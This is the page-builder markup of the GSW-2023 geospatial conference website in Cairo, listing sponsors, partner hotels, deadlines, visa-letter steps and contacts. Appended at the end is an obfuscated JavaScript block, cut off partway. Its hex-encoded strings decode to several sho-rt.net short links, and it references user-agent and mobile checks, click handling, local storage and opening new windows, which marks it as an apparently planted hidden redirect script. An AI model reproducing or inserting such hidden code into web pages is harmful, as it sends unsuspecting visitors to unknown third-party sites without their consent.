href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1687391337354{margin-top: 0px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"325\" height=\"183\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687389829594{margin-top: 7px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/4\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687389578407{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/4\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #ffff00; font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://gsw2023.com/index.php/flamenco-cairo-hotel/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/4\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #ffff00;\"> Novotel Cairo El Borg Hotel</span></h4>\n<p><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://cf.bstatic.com/xdata/images/hotel/max1024x768/222745005.jpg?k=18dfdc6ae56119c43bcff6e4a4f7f46814bcc54610f91414d64746d41bc2e9d0&amp;o=&amp;hp=1\" alt=\"Gallery image of this property\" width=\"249\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 15, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687390894260{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 